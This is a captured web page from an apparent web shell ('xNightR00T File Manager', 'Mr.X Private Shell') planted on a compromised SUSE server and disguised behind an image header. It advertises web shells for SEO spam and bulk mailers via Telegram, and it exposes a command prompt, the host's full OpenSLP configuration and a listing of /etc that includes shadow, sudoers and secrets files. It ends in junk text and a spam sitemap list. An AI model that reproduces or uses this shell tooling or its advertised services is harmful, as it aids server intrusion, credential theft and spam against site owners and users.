xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#############################################################################
#
# OpenSLP configuration file
#
# Format and contents conform to specification in IETF RFC 2614 so the
# comments use the language of the RFC.  In OpenSLP, SLPD operates as an SA
# and a DA.  The SLP UA functionality is encapsulated by SLPLIB.
#
#############################################################################


#----------------------------------------------------------------------------
# Static Scope and Static DA Configuration
#----------------------------------------------------------------------------

# This option is a comma delimited list of strings indicating the only scopes
# a UA or SA is allowed when making requests or registering or the scopes a
# DA must support. (default value is "DEFAULT")
;net.slp.useScopes = myScope1, myScope2, myScope3

# Allows administrator to force UA and SA agents to use specific DAs.  If
# this setting is not used dynamic DA discovery will be used to determine
# which DAs to use.  (Default is to use dynamic DA discovery)
;net.slp.DAAddresses = myDa1,myDa2,myDa3

# Enables backup of registrations to /etc/slp.reg.d/slpd/DABackup.
;net.slp.isDABackup = true

# A 32 bit integer giving the number of seconds for the DABackup file update.
# Default is 15 minutes (900 seconds). Ignored if isDA is false.
;net.slp.DABackupInterval = 900

# Include local registrations in the backup, too. The default is false.
;net.slp.DABackupLocalReg = true

# Enables slpd to sync service registration between SLP DAs on startup
# Default is false
;net.slp.DASyncReg = true


#----------------------------------------------------------------------------
# DA Specific Configuration
#----------------------------------------------------------------------------

# Enables slpd to function as a DA. Only a very few DAs should exist.  It 
# is suggested that the administrator read the OpenSLP users guide before
# enabling this setting. Default is false.  Uncomment the line below to 
# enable DA operation.
;net.slp.isDA = true

# A 32 bit integer giving the number of seconds for the DA heartbeat. 
# Default is 3 hours (10800 seconds).  This property corresponds to
# the protocol specification parameter CONFIG_DA_BEAT [7].  Ignored 
# if isDA is false.
;net.slp.DAHeartBeat = 10800

# A 32 bit integer giving the number of seconds after which a DA is considered
# stale and is removed from the list of known DAs, if a DA advert has not
# been received for it.  This value affects DAs in that it overrides
# net.slp.DAHeartBeat to ensure that DA adverts are sent out at an appropriate
# rate dependent on this value.  It affects SA operation, in that heartbeats
# (DA adverts) are monitored to maintain only active DAs in the known DA list.
# Default is 0 (disabled).  A minimum of 60s will be applied if non-zero.
;net.slp.staleDACheckPeriod = 60

#----------------------------------------------------------------------------
# SA Specific Configuration
#----------------------------------------------------------------------------

# If net.slp.watchRegistrationPID is set to true, local registrations made
# with the SA via the SLPReg() API call will be monitored.  If the PID of the
# process (and/or thread on Linux) disappears (the registering process died
# unexpectedly without calling SLPDereg()), then the registration is 
# automatically de-registered.  Default value is true.  Note that 'slptool'
# always uses value false for the 'register' command.  Uncomment the line
# below to disable PID watching.
;net.slp.watchRegistrationPID = false


#----------------------------------------------------------------------------
# UA Specific Configuration
#----------------------------------------------------------------------------
# A 32 bit integer giving the maximum number of results to accumulate and 
# return for a synchronous request before the timeout, or the maximum number
# of results to return through a callback if the request results are 
# reported asynchronously (default value is 256).
;net.slp.maxResults = 256


# An experimental/test setting that tells libslp to send SLP v1 commands 
# instead of v2 commands where-ever the code currently supports it.
# Default is false.
;net.slp.preferSLPv1 = false

#----------------------------------------------------------------------------
# Network Configuration Properties
#----------------------------------------------------------------------------

# Force broadcasts to be used instead of multicast. This setting is seldom
# necessary since OpenSLP will automatically use broadcast if multicast
# is unavailable. (Default is false)
;net.slp.isBroadcastOnly = true

# A boolean indicating whether passive DA detection should be used.
# Default is true.  Uncomment the following line to disable passive DA 
# detection
;net.slp.passiveDADetection = false

# A boolean indicating whether active DA detection should be used. This is
# useful when the DAs available are explicitly restricted to those obtained
# from DHCP or the net.slp.DAAddresses property. Default is true.  Uncomment
# the following line to disable active DA detection
;net.slp.activeDADetection = false

# The net.slp.DAActiveDiscoveryInterval property controls *periodic* 
# transmission of active DA discovery SrvRqsts.  The default setting
# of 1 which disables sending periodic active DA discovery SrvRqsts.  
# However, even if net.slp.DAActiveDiscoveryInterval=1 OpenSLP agents will
# send a send active DA request only upon initialization.  To disable all 
# active DA detection you MUST net.slp.passiveDADetection = false. (you
# may also set net.slp.DAActiveDiscoveryInterval=0)
# simply set 
;net.slp.DAActiveDiscoveryInterval = 1

# A positive integer that is less than or equal to 255. (The default is  255)
;net.slp.multicastTTL = 255

# An integer giving the maximum amount of time (in milliseconds) to perform
# active DA discovery requests. (Default is 2000 ms or 2 secs).
;net.slp.DADiscoveryMaximumWait = 2000

# A value-list of 32 bit integers used as timeouts, in milliseconds, to 
# implement the multicast convergence algorithm during active DA discovery.
# Each value specifies the time to wait before sending the next request, or
# until nothing new has been learned from two successive requests. 
# Default is:  500,750,1000,1500,2000,3000.
;net.slp.DADiscoveryTimeouts = 500,750,1000,1500,2000,3000

# An integer giving the maximum amount of time (in milliseconds) to perform
# multicast requests. (Default is 5000 ms or 5 secs).
;net.slp.multicastMaximumWait = 5000

# A value-list of 32 bit integers used as timeouts, in milliseconds, to
# implement the multicast convergence algorithm.  Each value specifies
# the time to wait before sending the next request, or until nothing new 
# has been learned from two successive requests.  
# Default is:  500,750,1000,1500,2000,3000.  In a slow network the less
# aggressive values of 3000,3000,3000,3000,3000 allow better performance.  
;net.slp.multicastTimeouts  = 500,750,1000,1500,2000,3000

# An integer giving the maximum amount of time (in milliseconds) to perform
# unicast requests. (Default is 5000 ms or 5 secs).
;net.slp.unicastMaximumWait = 5000 

# A value-list of 32 bit integers used as timeouts, in milliseconds, to 
# implement unicast datagram transmission to DAs.  The nth value gives
# the time to block waiting for a reply on the nth try to contact the DA.
;net.slp.unicastTimeouts  = 500,750,1000,1500,2000,3000

# To OpenSLP the following is the same as net.slp.unicastTimeouts.  Use 
# net.slp.unicastTimeouts instead.
;net.slp.datagramTimeouts = IGNORED

# An integer giving the maximum value for all random wait parameters.
# (Default is 5000 or 5 sec)
;net.slp.randomWaitBound = 5000

# A integer giving the network packet MTU in bytes. (Default is 1400)
;net.slp.MTU = 1400

# make sure that UDP packets really are smaller than the MTU. Normally
# openslp will truncate packets so that they are a bit bigger than
# the MTU, as a workaround for bugs in old openslp implementations.
# (Default is false)
;net.slp.hardMTU = false

#
# If operating as an SA or DA, this specifies the maximum number of interfaces
# that can be active. (Default is 100)
;net.slp.max_ifaces = 100

# If operating as an SA or DA, then any local addresses that are going to be
# used must be specified.  Both IPv4 and IPv6 addresses may be specified.
# Only link-local addresses can be used for IPv6 SLP multicast.  Any
# site-local or global addresses will be used, but only for unicast SLP.
# Option parameter "%" can be used to specify the interface when multiple
# instance of the same link-local address are present in the same host. If
# the interface option is not provided, the daemon will bind to the first
# interface with specified ip. This option is only valid for IPv6 link-local
# addresses. Eg: fe80::215:58ff:fe7e:c037%eth0
;net.slp.interfaces = 192.168.0.1

# This option is a string indicating the broadcast address to use when 
# sending broadcast packets.  This parameter is only applicable when the
# other broadcast configuration variables are set (multicast is used by default)  
;net.slp.broadcastAddr = 255.255.255.255

# Port to use for all SLP messages. Changing this from the reserved SLP
# listening port will break compliance with RFC2608. (Default is 427).
;net.slp.port = 427

# A boolean indicating whether DHCP should be used for DA discovery and/or
# scope discovery. (Default setting is true).
;net.slp.useDHCP = true

# A 32 bit integer giving the time to wait until an unicast active discovery
# request is retried, being because the DA was not reachable on startup
# or the DA was declared dead. Unicast active discovery requests are made
# to DAs configured via net.slp.DAAddresses or via DHCP. Use a value of
# zero to disable this feature. (Default is 300)
;net.slp.DAUnicastActiveDiscoveryInterval = 300

#----------------------------------------------------------------------------
# Security
#----------------------------------------------------------------------------
# A boolean indicating whether the agent should enable security for URLs,
# attribute lists, DAAdverts, and SAAdverts.  (Default setting is false and 
# ENABLE_SECURITY code must be compiled)
;net.slp.securityEnabled=true

# A boolean indicating whether the DA or SA will only allow deregistrations 
# and re-registration from the *exact* host that made the registration. 
# Default setting if true.   Uncomment the line below to disable source 
# address checking.
;net.slp.checkSourceAddr=false

#----------------------------------------------------------------------------
# Indexing
#----------------------------------------------------------------------------
# A boolean indicating whether SLP service types should be indexed.  This
# uses additional memory, but speeds up searching by (concrete) service type,
# and attribute retrieval.  (Default setting is false).
;net.slp.indexSrvtype=true

# A list of names of attributes with string values that should be indexed.
# This uses additional memory but speeds up searching by equality (including
# wildcard searches)
# eg. (location=Main Building Second Floor) or (location=Main Building*)
# The index will also be used when the equality expression is part of a top-level
# '&' expression   eg. (&(grade>=C)(location=Main Building*)) would use
# the index on the location attribute.
# Note that whitespace is significant in the list of names.
;net.slp.indexedAttributes=attr1,attr2,...

#----------------------------------------------------------------------------
# Tracing and Logging
#----------------------------------------------------------------------------

# A boolean controlling printing of messages about traffic with DAs.  
# Default is false.  Uncomment the following line to enable DA traffic 
# tracing
;net.slp.traceDATraffic = true

# A boolean controlling dumps of all registered services upon registration 
# and deregistration.  If true, the contents of the DA or SA server are 
# dumped after a registration or deregistration occurs.  Default is false.
# Uncommment the following line to enable registration message logging
;net.slp.traceReg = true

# A boolean controlling printing details when a SLP message is dropped for 
# any reason.  Default is false.  Uncomment the following line to trace all
# dropped messages
;net.slp.traceDrop = true

# A boolean controlling printing of details on SLP messages. The fields in 
# all incoming messages and outgoing replies are printed.  Very verbose.
# Default is false. Uncomment the following line to enable verbose message
# tracing.
;net.slp.traceMsg = true

# A boolean controlling whether or not slpd appends log messages to slpd.log,
# or if it overwrites the existing log.  Default is true.  Uncomment the
# following line to overwrite the existing log.
;net.slp.appendLog = false

#----------------------------------------------------------------------------
# Serialized Proxy Registration
#----------------------------------------------------------------------------
# The net.slp.serializedRegURL is not supported by net.slp.serializeRegURL.
#
# slpd accepts the [-r] command line parameter that specifies the serialized
# registration file.  The default serialized registration file is 
# /etc/slp.reg


#----------------------------------------------------------------------------
# IPv6 configuration options
#----------------------------------------------------------------------------

# These settings specify which IP protocols to use for SLP.  The default is
# that IPv4 is enabled, and IPv6 is disabled.  Uncomment one or other of the
# following lines to change this.
;net.slp.useIPv4 = false
;net.slp.useIPv6 = true

Filemanager

Name Type Size Permission Actions
ConsoleKit Folder 0755
ImageMagick Folder 0755
ImageMagick-SUSE Folder 0755
NetworkManager Folder 0755
X11 Folder 0755
YaST2 Folder 0755
aliases.d Folder 0755
alternatives Folder 0755
apache2 Folder 0755
audisp Folder 0750
audit Folder 0750
auto.master.d Folder 0755
autoinstall Folder 0700
bash_completion.d Folder 0755
binfmt.d Folder 0755
ca-certificates Folder 0755
cifs-utils Folder 0755
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cups Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
default Folder 0755
depmod.d Folder 0755
dirmngr Folder 0755
dracut.conf.d Folder 0755
fonts Folder 0755
gdbinit.d Folder 0755
gnupg Folder 0755
gpm Folder 0755
grub.d Folder 0755
gtk-3.0 Folder 0755
icewm Folder 0755
init.d Folder 0755
ipmi Folder 0755
iproute2 Folder 0755
iscsi Folder 0755
issue.d Folder 0755
java Folder 0755
joe Folder 0755
ld.so.conf.d Folder 0755
libnl Folder 0755
logrotate.d Folder 0755
logwatch Folder 0755
lvm Folder 0755
mcelog Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
multipath Folder 0700
my.cnf.d Folder 0755
named.d Folder 0755
netconfig.d Folder 0755
news Folder 0750
nginx Folder 0755
omc Folder 0755
one-context.d Folder 0755
openldap Folder 0755
opielocks Folder 0755
opt Folder 0755
pam.d Folder 0755
permissions.d Folder 0755
pkcs11 Folder 0755
pki Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
postfix Folder 0755
ppp Folder 0750
pptp.d Folder 0755
products.d Folder 0755
profile.d Folder 0755
pulse Folder 0755
qemu Folder 0755
rc.d Folder 0755
reader.conf.d Folder 0755
request-key.d Folder 0755
rpm Folder 0755
rsyslog.d Folder 0755
samba Folder 0755
sasl2 Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
skel Folder 0755
slp.reg.d Folder 0755
smartd_warning.d Folder 0755
snapper Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0750
susehelp.d Folder 0755
sysconfig Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
tmpdirs.d Folder 0755
tmpfiles.d Folder 0755
udev Folder 0755
uefi Folder 0755
unixODBC Folder 0755
uucp Folder 0750
vmware-tools Folder 0755
wicked Folder 0755
xdg Folder 0755
xinetd.d Folder 0755
zsh_completion.d Folder 0755
zypp Folder 0755
.pwd.lock File 0 B 0600
.updated File 163 B 0644
DIR_COLORS File 2.81 KB 0644
HOSTNAME File 19 B 0644
Muttrc File 152.85 KB 0644
SUSE-brand File 17 B 0644
SUSEConnect.example File 394 B 0644
SuSE-release File 215 B 0644
aclocal_dirlist File 25 B 0644
adjtime File 44 B 0644
aliases File 2.52 KB 0644
aliases.db File 12 KB 0644
at.deny File 62 B 0640
auto.master File 798 B 0644
auto.misc File 524 B 0644
auto.net File 902 B 0755
auto.smb File 2.14 KB 0755
autofs.conf File 14.02 KB 0644
autofs_ldap_auth.conf File 232 B 0600
bash.bashrc File 9.17 KB 0644
bash_command_not_found File 1.3 KB 0644
bind.keys File 1.82 KB 0644
bindresvport.blacklist File 415 B 0644
blkid.conf File 135 B 0644
bmc-snmp-proxy File 1.61 KB 0644
c-client.cf File 52 B 0644
cron.deny File 6 B 0600
crontab File 255 B 0600
cryptconfig.conf File 75 B 0644
csh.cshrc File 4.49 KB 0644
csh.login File 6.97 KB 0644
defaultdomain File 0 B 0644
dhclient.conf File 1.89 KB 0644
dhclient6.conf File 859 B 0644
dracut.conf File 117 B 0644
environment File 97 B 0644
ethers File 605 B 0644
exchange-bmc-os-info File 850 B 0644
exports File 322 B 0644
filesystems File 26 B 0644
fstab File 279 B 0644
ftpusers File 565 B 0644
gai.conf File 2.52 KB 0644
gdbinit File 211 B 0644
gemrc File 346 B 0644
generateCRL.conf File 448 B 0600
gnome_defaults.conf File 3.01 KB 0644
group File 678 B 0644
group- File 671 B 0644
host.conf File 370 B 0644
hostname File 19 B 0644
hosts File 687 B 0644
hosts.allow File 2.58 KB 0644
hosts.deny File 149 B 0644
hosts.equiv File 188 B 0644
hosts.lpd File 191 B 0644
hushlogins File 1 B 0644
idmapd.conf File 144 B 0644
inputrc File 14.56 KB 0644
insserv.conf File 171 B 0644
ipmievd File 58 B 0644
iscsid.conf File 12.74 KB 0600
issue File 78 B 0644
issue.net File 75 B 0644
krb5.conf File 771 B 0644
ld.so.cache File 49.42 KB 0644
ld.so.conf File 206 B 0644
lesskey File 899 B 0644
lesskey.bin File 405 B 0644
libaudit.conf File 191 B 0640
localtime File 351 B 0644
login.defs File 8.8 KB 0644
logrotate.conf File 517 B 0644
machine-id File 33 B 0444
magic File 113 B 0644
mail.rc File 112 B 0644
manpath.config File 11.78 KB 0644
mime.types File 100.51 KB 0644
mke2fs.conf File 808 B 0644
mkshrc File 9.17 KB 0644
motd File 1.54 KB 0644
mtab File 0 B 0444
mtools.conf File 2.09 KB 0644
my.cnf File 202 B 0644
netconfig File 767 B 0644
netgroup File 796 B 0644
netscsid.conf File 2.02 KB 0644
networks File 225 B 0644
nfsmount.conf File 3.31 KB 0644
nscd.conf File 2.33 KB 0644
nsswitch.conf File 1.16 KB 0644
ntp.conf File 3.04 KB 0640
ntp.keys File 28 B 0640
openct.conf File 2.95 KB 0644
opensc.conf File 21.6 KB 0644
opiekeys File 0 B 0600
os-release File 160 B 0644
passwd File 1.54 KB 0644
passwd- File 1.53 KB 0644
permissions File 12.08 KB 0644
permissions.easy File 18.36 KB 0644
permissions.local File 1.52 KB 0644
permissions.paranoid File 19.25 KB 0644
permissions.secure File 20.96 KB 0644
php.ini File 0 B 0644
polkit-default-privs.local File 486 B 0644
polkit-default-privs.restrictive File 37.07 KB 0644
polkit-default-privs.standard File 42.36 KB 0644
profile File 9 KB 0644
protocols File 22.71 KB 0644
python3start File 737 B 0644
pythonstart File 834 B 0644
quotagrpadmins File 220 B 0644
quotatab File 261 B 0644
raw File 221 B 0644
rc.splash File 2.64 KB 0644
rc.status File 11.5 KB 0644
request-key.conf File 1.85 KB 0644
resolv.conf File 38 B 0644
resolv.conf.netconfig File 833 B 0644
rmt File 34.83 KB 0755
rpc File 1.6 KB 0644
rsyncd.conf File 338 B 0644
rsyncd.secrets File 14 B 0600
rsyslog.conf File 4.6 KB 0600
screenrc File 127 B 0644
securetty File 161 B 0644
sensors3.conf File 9.98 KB 0644
services File 837.88 KB 0644
sestatus.conf File 216 B 0644
shadow File 790 B 0640
shadow- File 664 B 0640
shells File 268 B 0644
slp.conf File 13.41 KB 0644
slp.reg File 1.37 KB 0644
slp.spi File 2.64 KB 0644
smart_drivedb.h File 91 B 0644
smartd.conf File 6.98 KB 0644
smartd_warning.sh File 5.75 KB 0755
sudoers File 3.31 KB 0440
sysctl.conf File 560 B 0644
termcap File 1006 KB 0644
ttytype File 258 B 0644
vconsole.conf File 10 B 0644
vimrc File 7.82 KB 0644
vsftpd.conf File 7.57 KB 0600
warnquota.conf File 3.71 KB 0644
wgetrc File 4.48 KB 0644
wodim.conf File 1.31 KB 0644
xattr.conf File 654 B 0644
xinetd.conf File 1.42 KB 0644
yp.conf File 779 B 0644
zce.env File 139 B 0644
zce.rc File 169 B 0644
zprofile File 199 B 0644
zsh_command_not_found File 313 B 0644
zshenv File 45 B 0644
zshrc File 6.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml